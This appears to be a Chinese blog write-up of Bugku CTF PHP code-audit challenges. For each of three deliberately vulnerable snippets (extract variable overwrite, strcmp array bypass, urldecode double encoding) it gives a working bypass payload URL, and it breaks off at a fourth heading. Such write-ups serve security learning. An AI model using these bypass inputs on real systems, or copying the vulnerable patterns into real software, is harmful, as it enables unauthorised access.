bugku-代码审计 writeup

代码审计

在做bugku 代码审计的题时,发现有好多函数的绕过是之前没留意到的,记录一下

1.extract变量覆盖

题目地址:http://120.24.86.145:9009/1.php

<?php
$flag='xxx';
extract($_GET);
if(isset($shiyan))
{
$content=trim(file_get_contents($flag));
if($shiyan==$content)
{
echo'flag{xxx}';
}
else
{
echo'Oh.no';
}
}
?>

extract()使用参考:http://www.w3school.com.cn/php/func_array_extract.asp

解题方法:

GET请求?flag=&shiyan=extract()会将$flag$gift的值覆盖了,将变量的值设置为空或者不存在的文件就满足$gift == $content

PAYLOAD:http://120.24.86.145:9009/1.php?flag=&shiyan=

2.strcmp比较字符串

题目地址:http://120.24.86.145:9009/6.php

<?php
$flag = "flag{xxxxx}";
if (isset($_GET['a'])) {
if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。
//比较两个字符串(区分大小写)
die('Flag: '.$flag);
else
print 'No';
}
?>

PHP的strcmp()函数在PHP5.3版本之前使用数组可以绕过验证

strcmp()用法参考
函数期望传入的类型是字符串类型的数据,要是我们传入非字符串类型的数据的话,这个函数将发生错误,但是在5.3之前的php中,显示了报错的警告信息后,将return 0 。也就是说虽然报了错,但却判定其相等了,也就绕过了判断。

PAYLOAD:http://120.24.86.145:9009/6.php?a[]=1

3.urldecode二次编码绕过

题目地址:http://120.24.86.145:9009/10.php

<?php
if(eregi("hackerDJ",$_GET[id])) {
echo("

not allowed!
");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
echo "

Access granted!
";
echo "

flag
";
}
?>

eregi()是不区分大小写的正则匹配

字符串比对解析。

语法: int eregi(string pattern, string string, array [regs]);

返回值: 整数/数组

函数种类: 资料处理

解题思路:将hackerDJ使用小葵进行两次URL编码

得到%25%36%38%25%36%31%25%36%33%25%36%42%25%36%35%25%37%32%25%34%34%25%34%41

使用GET将id传进去

PAYLOAD:http://120.24.86.145:9009/10.php?id=%25%36%38%25%36%31%25%36%33%25%36%42%25%36%35%25%37%32%25%34%34%25%34%41

4.md5()函数

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值